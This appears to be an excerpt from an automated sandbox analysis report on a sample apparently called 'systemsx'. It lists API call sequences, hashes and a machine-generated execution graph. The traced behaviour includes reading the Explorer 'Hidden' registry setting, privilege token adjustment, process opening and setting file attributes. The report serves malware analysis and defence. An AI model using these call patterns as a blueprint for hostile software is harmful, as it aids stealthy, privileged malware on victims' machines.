                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8031877661DAC585D770EF2AE4D87AAA3A0F788740F404135DA8E83B68DF3DD554CB10
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                                                                          • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                          • API String ID: 779948276-85274793
                                                                                                                                                                                                                          • Opcode ID: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                                                                          • Instruction ID: 3b8d727cccecf090e983809aec3140a35c465e6a8ce7d78baea841e44a817900
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7060d5503734189d45e9b87f1606f2d82071d756b948eb52710f5919d09f1e4f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F012576618A808AD7609F25F884B1AB7A4F788794F805225EB8D43B68EF7CC155CB00
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF79483390D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833922
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833935
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833945
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833958
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF79483396D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833980
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833995
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948346E4: CreateFileW.KERNEL32 ref: 00007FF79483472B
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948340E4: GetCurrentProcess.KERNEL32 ref: 00007FF79483414B
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948340E4: OpenProcessToken.ADVAPI32 ref: 00007FF79483415E
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948340E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF794834186
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948340E4: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7948341B1
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948340E4: CloseHandle.KERNEL32 ref: 00007FF7948341BC
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948340E4: OpenProcess.KERNEL32 ref: 00007FF7948341D1
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948340E4: CloseHandle.KERNEL32 ref: 00007FF794834249
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32 ref: 00007FF794833037
                                                                                                                                                                                                                          • HeapFree.KERNEL32 ref: 00007FF79483304A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$Process$CloseCreateFileHandleHeapOpenToken$AdjustAttributesCurrentDirectoryFolderFreeLookupPathPrivilegePrivilegesValue
                                                                                                                                                                                                                          • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                          • API String ID: 3992431006-2286007224
                                                                                                                                                                                                                          • Opcode ID: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                                                                          • Instruction ID: 2c6db9ac70b35b8312b9b94321a7c95431eeeb434102e0026ad925d28833d7b4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7711C570A18A8785EA70FF36E8D4BA9A7A0FB84704F80C135D54D47665EF3CE069DB60

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:12.6%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                          Signature Coverage:0.4%
                                                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                                                          Total number of Limit Nodes:34
8536->8539 8540 403678 8536->8540 8548 4036d4 8539->8548 8549 4036ab 8539->8549 9412 40de80 GetLastError TlsGetValue SetLastError 8540->9412 8546 4035f9 8541->8546 8543 403618 9393 40de80 GetLastError TlsGetValue SetLastError 8543->9393 8544 4035c5 8551 40a7f5 5 API calls 8544->8551 8557 40dec0 3 API calls 8546->8557 8547 40364b 9411 40de80 GetLastError TlsGetValue SetLastError 8547->9411 8555 403707 8548->8555 8556 4036de 8548->8556 9414 40de80 GetLastError TlsGetValue SetLastError 8549->9414 8553 4035cc 8551->8553 8552 403620 9394 40a83a 8552->9394 8561 40dec0 3 API calls 8553->8561 8554 40367e 9413 40de80 GetLastError TlsGetValue SetLastError 8554->9413 8567 403711 8555->8567 8568 40373a 8555->8568 9416 40de80 GetLastError TlsGetValue SetLastError 8556->9416 8564 4035d6 8557->8564 8561->8564 9387 40de80 GetLastError TlsGetValue SetLastError 8564->9387 8565 403653 8574 40a83a 17 API calls 8565->8574 8566 4036b1 9415 40de80 GetLastError TlsGetValue SetLastError 8566->9415 9418 40de80 GetLastError TlsGetValue SetLastError 8567->9418 8572 403744 8568->8572 8573 40376d 8568->8573 8570 403686 8581 40a83a 17 API calls 8570->8581 8571 4036e4 9417 40de80 GetLastError TlsGetValue SetLastError 8571->9417 9420 40de80 GetLastError TlsGetValue SetLastError 8572->9420 8578 403777 8573->8578 8579 40379d 8573->8579 8585 40365f 8574->8585 8577 403717 9419 40de80 GetLastError TlsGetValue SetLastError 8577->9419 9422 40de80 GetLastError TlsGetValue SetLastError 8578->9422 8593 4037f5 8579->8593 8594 4037a7 8579->8594 8580 40dec0 3 API calls 8645 403636 8580->8645 8589 403692 8581->8589 8595 40dec0 3 API calls 8585->8595 8586 4036b9 8596 40a83a 17 API calls 8586->8596 8600 40dec0 3 API calls 8589->8600 8590 40381f 8601 40e020 4 API calls 8590->8601 8591 4036ec 8602 40a83a 17 API calls 8591->8602 8592 40374a 9421 40de80 GetLastError TlsGetValue SetLastError 8592->9421 9452 40de80 GetLastError TlsGetValue SetLastError 8593->9452 9424 40de80 GetLastError TlsGetValue SetLastError 
8594->9424 8595->8645 8597 4036c5 8596->8597 8606 40dec0 3 API calls 8597->8606 8598 40371f 8607 40a83a 17 API calls 8598->8607 8599 40377d 9423 40de80 GetLastError TlsGetValue SetLastError 8599->9423 8600->8645 8609 403827 8601->8609 8610 4036f8 8602->8610 8606->8645 8615 40372b 8607->8615 9388 405170 TlsGetValue 8609->9388 8618 40dec0 3 API calls 8610->8618 8611 403752 8619 40a83a 17 API calls 8611->8619 8612 4037ad 9425 40de80 GetLastError TlsGetValue SetLastError 8612->9425 8613 4037fb 9453 40de80 GetLastError TlsGetValue SetLastError 8613->9453 8623 40dec0 3 API calls 8615->8623 8616 403785 8624 40a83a 17 API calls 8616->8624 8618->8645 8626 40375e 8619->8626 8621 4037b5 9426 409355 8621->9426 8622 403803 8628 40a7f5 5 API calls 8622->8628 8623->8645 8629 403791 8624->8629 8625 40382e 8631 40df50 HeapFree 8625->8631 8630 40dec0 3 API calls 8626->8630 8633 40380a 8628->8633 8634 40dec0 3 API calls 8629->8634 8630->8645 8635 403846 8631->8635 8637 40dec0 3 API calls 8633->8637 8634->8645 8638 40df50 HeapFree 8635->8638 8636 40dec0 3 API calls 8639 4037d0 8636->8639 8637->8564 8640 40384e 8638->8640 8641 4037e9 8639->8641 8642 4037dd 8639->8642 8640->7678 8644 401fa9 36 API calls 8641->8644 9449 405532 8642->9449 8644->8645 8645->8564 8646->7682 8647->7684 8649 40dfc0 21 API calls 8648->8649 8650 402c04 8649->8650 8651 4051a0 3 API calls 8650->8651 8652 402c0d 8651->8652 8653 405060 2 API calls 8652->8653 8654 402c19 8653->8654 8655 409ba0 RtlAllocateHeap 8654->8655 8656 402c23 GetShortPathNameW 8655->8656 9462 40de80 GetLastError TlsGetValue SetLastError 8656->9462 8658 402c3f 9463 40de80 GetLastError TlsGetValue SetLastError 8658->9463 8660 402c47 8661 409c10 5 API calls 8660->8661 8662 402c57 8661->8662 8663 40dec0 3 API calls 8662->8663 8664 402c61 8663->8664 9464 409b80 HeapFree 8664->9464 8666 402c6a 9465 40de80 GetLastError TlsGetValue SetLastError 8666->9465 8668 402c74 8669 40e020 4 API calls 8668->8669 8670 402c7c 8669->8670 9466 405170 TlsGetValue 
8670->9466 8672 402c83 8673 40df50 HeapFree 8672->8673 8674 402c9a 8673->8674 8675 40df50 HeapFree 8674->8675 8676 402ca3 8675->8676 8677 40e080 TlsGetValue 8676->8677 8677->7688 8678->7690 8680 404434 8679->8680 8682 4098c7 SetEnvironmentVariableW 8679->8682 8680->7693 8682->8680 8683->7696 8684->7704 8686 40dfc0 21 API calls 8685->8686 8687 401e5f 8686->8687 8688 4051a0 3 API calls 8687->8688 8689 401e68 8688->8689 9467 40de80 GetLastError TlsGetValue SetLastError 8689->9467 8691 401e6e 9468 40de80 GetLastError TlsGetValue SetLastError 8691->9468 8693 401e76 8694 409698 7 API calls 8693->8694 8695 401e7d 8694->8695 8696 40dec0 3 API calls 8695->8696 8697 401e87 PathQuoteSpacesW 8696->8697 8698 401ee0 8697->8698 8699 401e97 8697->8699 9537 40de80 GetLastError TlsGetValue SetLastError 8698->9537 9471 40de80 GetLastError TlsGetValue SetLastError 8699->9471 8702 401e9d 9472 4024f1 8702->9472 8703 401ee9 8705 40e020 4 API calls 8703->8705 8707 401ef1 8705->8707 8709 40dec0 3 API calls 8707->8709 8708 40dec0 3 API calls 8710 401eae 8708->8710 8711 401ede 8709->8711 9536 40de80 GetLastError TlsGetValue SetLastError 8710->9536 9469 40de80 GetLastError TlsGetValue SetLastError 8711->9469 8714 401eb7 8716 40e020 4 API calls 8714->8716 8715 401f05 8717 40e020 4 API calls 8715->8717 8718 401ebf 8716->8718 8719 401f0d 8717->8719 8720 40e020 4 API calls 8718->8720 9470 405170 TlsGetValue 8719->9470 8722 401eca 8720->8722 8724 40e020 4 API calls 8722->8724 8723 401f14 8726 40df50 HeapFree 8723->8726 8725 401ed4 8724->8725 8727 40dec0 3 API calls 8725->8727 8728 401f2b 8726->8728 8727->8711 8729 40df50 HeapFree 8728->8729 8730 401f34 8729->8730 8730->7707 8732 40385b 8731->8732 8732->8732 8733 40dfc0 21 API calls 8732->8733 8751 40386d 8733->8751 8734 4038ee 9568 40de80 GetLastError TlsGetValue SetLastError 8734->9568 8736 4038f4 9569 40de80 GetLastError TlsGetValue SetLastError 8736->9569 8738 4038fc 9570 40de80 GetLastError TlsGetValue SetLastError 8738->9570 8739 405dc0 3 API 
calls 8739->8751 8741 403904 9571 40de80 GetLastError TlsGetValue SetLastError 8741->9571 8743 40390c 8745 40d100 8 API calls 8743->8745 8744 40de80 GetLastError TlsGetValue SetLastError 8744->8751 8746 40391e 8745->8746 9572 405182 TlsGetValue 8746->9572 8747 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8747->8751 8749 403923 8750 405eb0 6 API calls 8749->8750 8752 40392b 8750->8752 8751->8734 8751->8739 8751->8744 8751->8747 8753 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8751->8753 8754 40dec0 3 API calls 8752->8754 8753->8751 8755 403935 8754->8755 9573 40de80 GetLastError TlsGetValue SetLastError 8755->9573 8757 40393b 9574 40de80 GetLastError TlsGetValue SetLastError 8757->9574 8759 403943 9575 40de80 GetLastError TlsGetValue SetLastError 8759->9575 8761 40394b 9576 40de80 GetLastError TlsGetValue SetLastError 8761->9576 8763 403953 8764 40d100 8 API calls 8763->8764 8765 403965 8764->8765 9577 405182 TlsGetValue 8765->9577 8767 40396a 8768 405eb0 6 API calls 8767->8768 8769 403972 8768->8769 8770 40dec0 3 API calls 8769->8770 8771 40397c 8770->8771 9578 40de80 GetLastError TlsGetValue SetLastError 8771->9578 8773 403982 9579 40de80 GetLastError TlsGetValue SetLastError 8773->9579 8775 40398a 9580 40de80 GetLastError TlsGetValue SetLastError 8775->9580 8777 403992 9581 40de80 GetLastError TlsGetValue SetLastError 8777->9581 8779 40399a 8780 40d100 8 API calls 8779->8780 8781 4039aa 8780->8781 9582 405182 TlsGetValue 8781->9582 8783 4039af 8784 405eb0 6 API calls 8783->8784 8785 4039b7 8784->8785 8786 40dec0 3 API calls 8785->8786 8787 4039c1 8786->8787 9583 40de80 GetLastError TlsGetValue SetLastError 8787->9583 8789 4039c7 9584 40de80 GetLastError TlsGetValue SetLastError 8789->9584 8791 4039cf 9585 40de80 GetLastError TlsGetValue SetLastError 8791->9585 8793 4039d7 9586 40de80 GetLastError TlsGetValue SetLastError 8793->9586 8795 4039df 8796 40d100 8 API calls 8795->8796 8797 4039ef 8796->8797 9587 405182 TlsGetValue 8797->9587 8799 4039f4 
8800 405eb0 6 API calls 8799->8800 8801 4039fc 8800->8801 8802 40dec0 3 API calls 8801->8802 8803 403a06 8802->8803 9588 40de80 GetLastError TlsGetValue SetLastError 8803->9588 8805 403a0c 9589 40de80 GetLastError TlsGetValue SetLastError 8805->9589 8807 403a14 9590 40de80 GetLastError TlsGetValue SetLastError 8807->9590 8809 403a1c 9591 40de80 GetLastError TlsGetValue SetLastError 8809->9591 8811 403a24 8812 40d100 8 API calls 8811->8812 8813 403a34 8812->8813 9592 405182 TlsGetValue 8813->9592 8815 403a39 8816 405eb0 6 API calls 8815->8816 8817 403a41 8816->8817 8818 40dec0 3 API calls 8817->8818 8819 403a4b 8818->8819 9593 40de80 GetLastError TlsGetValue SetLastError 8819->9593 8821 403a51 9594 403cd7 8821->9594 8824 4051a0 3 API calls 8825 403a66 8824->8825 9635 40de80 GetLastError TlsGetValue SetLastError 8825->9635 8827 403a6c 8828 403cd7 84 API calls 8827->8828 8829 403a7c 8828->8829 8830 40dec0 3 API calls 8829->8830 8831 403a88 8830->8831 9636 40de80 GetLastError TlsGetValue SetLastError 8831->9636 8833 403a8e 8834 403cd7 84 API calls 8833->8834 8835 403a9e 8834->8835 8836 40dec0 3 API calls 8835->8836 8837 403aa8 8836->8837 9637 40de80 GetLastError TlsGetValue SetLastError 8837->9637 8839 403aae 8840 403cd7 84 API calls 8839->8840 8841 403abe 8840->8841 8842 40dec0 3 API calls 8841->8842 8843 403ac8 8842->8843 9638 40de80 GetLastError TlsGetValue SetLastError 8843->9638 8845 403ace 8846 403cd7 84 API calls 8845->8846 8847 403ade 8846->8847 8848 40dec0 3 API calls 8847->8848 8849 403ae8 8848->8849 9639 40de80 GetLastError TlsGetValue SetLastError 8849->9639 8851 403aee 9640 40de80 GetLastError TlsGetValue SetLastError 8851->9640 8853 403af6 9641 40de80 GetLastError TlsGetValue SetLastError 8853->9641 8855 403afe 8856 402bfa 43 API calls 8855->8856 8857 403b0b 8856->8857 9642 40e080 TlsGetValue 8857->9642 8859 403b10 9643 405182 TlsGetValue 8859->9643 8861 403b1f 9644 406650 8861->9644 8864 40dec0 3 API calls 8865 403b32 8864->8865 9647 40de80 GetLastError 
TlsGetValue SetLastError 8865->9647 8867 403b38 9648 40de80 GetLastError TlsGetValue SetLastError 8867->9648 8869 403b40 9649 40de80 GetLastError TlsGetValue SetLastError 8869->9649 8871 403b48 8872 402bfa 43 API calls 8871->8872 8873 403b55 8872->8873 9650 40e080 TlsGetValue 8873->9650 8875 403b5a 9651 405182 TlsGetValue 8875->9651 8877 403b69 8878 406650 13 API calls 8877->8878 8879 403b72 8878->8879 8880 40dec0 3 API calls 8879->8880 8881 403b7c 8880->8881 9652 40de80 GetLastError TlsGetValue SetLastError 8881->9652 8883 403b82 9653 40de80 GetLastError TlsGetValue SetLastError 8883->9653 8885 403b8e 8886 40e020 4 API calls 8885->8886 8887 403b96 8886->8887 8888 40e020 4 API calls 8887->8888 8889 403ba1 8888->8889 8890 40e020 4 API calls 8889->8890 8891 403bab 8890->8891 8892 40e020 4 API calls 8891->8892 8893 403bb5 8892->8893 8894 40e020 4 API calls 8893->8894 8895 403bbf 8894->8895 9654 40e080 TlsGetValue 8895->9654 8897 403bc4 9655 405182 TlsGetValue 8897->9655 8899 403bcf 9656 40240c 8899->9656 8902 4051a0 3 API calls 8903 403bdd 8902->8903 8904 40df50 HeapFree 8903->8904 8905 403be8 8904->8905 8906 40df50 HeapFree 8905->8906 8907 403bf1 8906->8907 8908 40df50 HeapFree 8907->8908 8909 403bfa 8908->8909 8910 40df50 HeapFree 8909->8910 8911 403c03 8910->8911 8912 40df50 HeapFree 8911->8912 8913 403c0c 8912->8913 8914 40df50 HeapFree 8913->8914 8915 403c15 8914->8915 8916 40df50 HeapFree 8915->8916 8917 403c1e 8916->8917 8918 40df50 HeapFree 8917->8918 8919 403c27 8918->8919 8920 40df50 HeapFree 8919->8920 8921 403c30 8920->8921 8922 40df50 HeapFree 8921->8922 8923 403c39 8922->8923 8924 40de80 GetLastError TlsGetValue SetLastError 8923->8924 8924->7712 8925->7718 8926->7734 8979 4054b7 EnterCriticalSection 8978->8979 8980 404502 8978->8980 8985 4054cd 8979->8985 8987 4054fd 8979->8987 8980->7731 8981 40db72 HeapAlloc 8983 405517 LeaveCriticalSection 8981->8983 8982 4054ce WaitForSingleObject 8984 4054de CloseHandle 8982->8984 8982->8985 8983->8980 8985->8982 
8985->8987 8987->8981 8989 40dfc0 21 API calls 8988->8989 8990 402cb7 8989->8990 8991 405060 2 API calls 8990->8991 8993 402cc3 8991->8993 9103 40e0e0 9053->9103 9057 402bc7 9056->9057 9057->9057 9058 40dfc0 21 API calls 9057->9058 9059 402bd9 GetNativeSystemInfo 9058->9059 9060 402bec 9059->9060 9060->8203 9060->8204 9061->8230 9062->8237 9064 4055c8 9063->9064 9068 4032bd 9063->9068 9064->9068 9109 405553 memset GetModuleHandleW 9064->9109 9067 405606 GetVersionExW 9067->9068 9068->8204 9069->8212 9070->8216 9072 40e260 3 API calls 9071->9072 9073 4032ef 9072->9073 9073->8222 9074->8227 9075->8243 9076->8258 9112 40d498 EnterCriticalSection 9077->9112 9079 40add5 9080 40ae6e 9079->9080 9081 40addf CreateFileW 9079->9081 9080->8269 9082 40ae00 9081->9082 9083 40ae20 9081->9083 9082->9083 9085 40ae0d HeapAlloc 9082->9085 9086 40ae65 9083->9086 9122 40d40a EnterCriticalSection 9083->9122 9085->9083 9086->8269 9088 40a9e9 9087->9088 9089 40a9da 9087->9089 9133 40d459 EnterCriticalSection 9088->9133 9137 40d9f5 9089->9137 9094 40aa2d 9094->8270 9095 40aa19 CloseHandle 9097 40d40a 4 API calls 9095->9097 9097->9094 9098 40aa08 HeapFree 9098->9095 9099->8277 9100->8279 9101->8211 9102->8215 9104 4032a2 9103->9104 9105 40e0ea wcslen HeapAlloc 9103->9105 9104->8199 9107 40e3a0 9105->9107 9108 40e3b0 9107->9108 9108->9104 9110 40558b 9109->9110 9111 40557b GetProcAddress 9109->9111 9110->9067 9110->9068 9111->9110 9113 40d4b2 9112->9113 9114 40d4c7 9112->9114 9115 40db72 HeapAlloc 9113->9115 9116 40d4ec 9114->9116 9117 40d4cc HeapReAlloc 9114->9117 9118 40d4c1 9115->9118 9119 40d501 HeapAlloc 9116->9119 9120 40d4f5 9116->9120 9117->9116 9121 40d51d LeaveCriticalSection 9118->9121 9119->9120 9120->9121 9121->9079 9123 40d441 9122->9123 9124 40d422 9122->9124 9130 40db32 9123->9130 9124->9123 9126 40d427 9124->9126 9127 40d430 memset 9126->9127 9128 40d44d LeaveCriticalSection 9126->9128 9127->9128 9128->9086 9129 40d44b 9129->9128 9131 40db43 HeapFree 9130->9131 9131->9129 
9134 40d472 9133->9134 9135 40d47d LeaveCriticalSection 9133->9135 9134->9135 9136 40a9f6 9135->9136 9136->9094 9136->9095 9143 40aa40 9136->9143 9138 40da02 9137->9138 9139 40a9e5 9137->9139 9146 40db1b EnterCriticalSection 9138->9146 9139->8270 9142 40da08 9142->9139 9147 40dac4 9142->9147 9144 40aa54 WriteFile 9143->9144 9145 40aa7c 9143->9145 9144->9098 9145->9098 9146->9142 9149 40dad0 9147->9149 9148 40db14 9148->9142 9149->9148 9150 40db0a LeaveCriticalSection 9149->9150 9150->9148 9152 409ba8 RtlAllocateHeap 9151->9152 9153 409bba 9151->9153 9152->8303 9153->8303 9168 40e7e0 9154->9168 9156 402f24 9156->8308 9158 40dfc0 21 API calls 9157->9158 9159 4026c1 LoadResource SizeofResource 9158->9159 9160 409ba0 RtlAllocateHeap 9159->9160 9161 4026ee 9160->9161 9187 409c80 memcpy 9161->9187 9163 402705 FreeResource 9164 402715 9163->9164 9165 4046ef 9164->9165 9188 409b60 9165->9188 9167 4046f8 9167->8306 9169 40e7f8 __fprintf_l 9168->9169 9171 40e8aa __fprintf_l 9169->9171 9172 40e950 9169->9172 9171->9156 9173 40f3b2 9172->9173 9177 40e960 __fprintf_l 9172->9177 9173->9169 9174 40ef37 9178 40efa4 __fprintf_l 9174->9178 9179 4104f0 9174->9179 9176 40ee4f memcpy 9176->9177 9177->9173 9177->9174 9177->9176 9178->9169 9180 410504 9179->9180 9181 410572 memcpy 9180->9181 9182 41054c memcpy 9180->9182 9184 41051f 9180->9184 9185 410599 memcpy 9181->9185 9186 4105b8 9181->9186 9182->9178 9184->9178 9185->9178 9186->9178 9187->9163 9189 409b68 HeapSize 9188->9189 9190 409b7a 9188->9190 9189->9167 9190->9167 9191->8321 9192->8329 9193->8320 9194->8324 9195->8328 9196->8332 9198 409c29 9197->9198 9199 409c19 9197->9199 9200 40e260 3 API calls 9198->9200 9299 409bc0 9199->9299 9203 409c3f 9200->9203 9305 40e3f0 TlsGetValue 9203->9305 9205 409c68 9205->8336 9206->8340 9306 405f90 9207->9306 9209 402211 9209->8345 9210->8349 9211->8351 9212->8353 9213->8355 9214->8359 9215->8365 9216->8367 9217->8369 9218->8371 9220 40590f 9219->9220 9227 405801 9219->9227 9316 40e340 
TlsGetValue 9220->9316 9222 405918 9222->8373 9223 405886 9225 40e1e0 TlsGetValue 9223->9225 9224 405850 wcsncmp 9224->9227 9226 4058c7 9225->9226 9228 4058e9 9226->9228 9315 40e230 TlsGetValue 9226->9315 9227->9223 9227->9224 9229 40e260 3 API calls 9228->9229 9231 4058f0 9229->9231 9233 405901 9231->9233 9234 4058f6 wcsncpy 9231->9234 9232 4058d7 memmove 9232->9228 9233->8373 9234->9233 9235->8375 9236->8377 9237->8379 9238->8383 9239->8385 9317 408e58 9240->9317 9242 408f81 9243 408e58 3 API calls 9242->9243 9244 408f90 9243->9244 9245 408e58 3 API calls 9244->9245 9246 408fa3 9245->9246 9247 408fb0 GetStockObject 9246->9247 9248 408fbd LoadIconW LoadCursorW RegisterClassExW 9246->9248 9247->9248 9321 4094d1 GetForegroundWindow 9248->9321 9253 409047 IsWindowEnabled 9254 40906b 9253->9254 9255 409052 EnableWindow 9253->9255 9256 4094d1 3 API calls 9254->9256 9255->9254 9257 40907e GetSystemMetrics GetSystemMetrics CreateWindowExW 9256->9257 9258 4092ba 9257->9258 9259 4090cb SetWindowLongW CreateWindowExW SendMessageW 9257->9259 9260 4092cd 9258->9260 9335 40e340 TlsGetValue 9258->9335 9261 409125 9259->9261 9262 409128 CreateWindowExW SendMessageW SetFocus 9259->9262 9336 408e9a 9260->9336 9261->9262 9264 4091a5 CreateWindowExW SendMessageW CreateAcceleratorTableW SetForegroundWindow BringWindowToTop 9262->9264 9265 40917b SendMessageW wcslen wcslen SendMessageW 9262->9265 9268 40926a 9264->9268 9265->9264 9270 409273 9268->9270 9271 40922e GetMessageW 9268->9271 9269 408e9a HeapFree 9272 4092df 9269->9272 9274 409277 DestroyAcceleratorTable 9270->9274 9275 40927e 9270->9275 9271->9270 9273 409243 TranslateAcceleratorW 9271->9273 9276 408e9a HeapFree 9272->9276 9273->9268 9277 409254 TranslateMessage DispatchMessageW 9273->9277 9274->9275 9275->9258 9278 409285 wcslen 9275->9278 9279 4022e5 9276->9279 9277->9268 9280 40e260 3 API calls 9278->9280 9279->8388 9281 40929c wcscpy HeapFree 9280->9281 9281->9258 9282->8394 9283->8396 9284->8398 9285->8400 9286->8404 
9287->8411 9288->8413 9289->8415 9290->8419 9291->8421 9293 4094d1 3 API calls 9292->9293 9294 408e2d 9293->9294 9295 409588 16 API calls 9294->9295 9296 408e36 MessageBoxW 9295->9296 9297 409588 16 API calls 9296->9297 9298 40239f 9297->9298 9298->8424 9300 409bcd 9299->9300 9301 40e260 3 API calls 9300->9301 9302 409beb 9301->9302 9303 409bf1 memcpy 9302->9303 9304 409bff 9302->9304 9303->9304 9304->8336 9305->9205 9309 405fa1 9306->9309 9307 40e1e0 TlsGetValue 9308 406014 9307->9308 9310 40e260 3 API calls 9308->9310 9309->9307 9309->9309 9311 406022 9310->9311 9313 406032 9311->9313 9314 40e370 TlsGetValue 9311->9314 9313->9209 9314->9313 9315->9232 9316->9222 9318 408e60 wcslen HeapAlloc 9317->9318 9319 408e96 9317->9319 9318->9319 9320 408e86 wcscpy 9318->9320 9319->9242 9320->9242 9322 409032 9321->9322 9323 4094e2 GetWindowThreadProcessId GetCurrentProcessId 9321->9323 9324 409588 9322->9324 9323->9322 9325 409592 EnumWindows 9324->9325 9330 4095dd 9324->9330 9326 40903e 9325->9326 9327 4095af 9325->9327 9339 409507 GetWindowThreadProcessId GetCurrentThreadId 9325->9339 9326->9253 9326->9254 9327->9326 9329 4095b1 GetCurrentThreadId 9327->9329 9332 4095c4 SetWindowPos 9327->9332 9328 4095ea GetCurrentThreadId 9328->9330 9329->9327 9330->9326 9330->9328 9331 409600 EnableWindow 9330->9331 9333 409611 SetWindowPos 9330->9333 9334 40db32 HeapFree 9330->9334 9331->9330 9332->9327 9333->9330 9334->9330 9335->9260 9337 408ea1 HeapFree 9336->9337 9338 408eb3 9336->9338 9337->9338 9338->9269 9340 409525 IsWindowVisible 9339->9340 9341 40957f 9339->9341 9340->9341 9342 409530 9340->9342 9343 40db72 HeapAlloc 9342->9343 9344 40953c GetCurrentThreadId GetWindowLongW 9343->9344 9345 40955a 9344->9345 9346 40955e GetForegroundWindow 9344->9346 9345->9346 9346->9341 9347 409568 IsWindowEnabled 9346->9347 9347->9341 9348 409573 EnableWindow 9347->9348 9348->9341 9349->8435 9350->8438 9352 40e260 3 API calls 9351->9352 9353 40a769 GetTempPathW LoadLibraryW 9352->9353 9354 
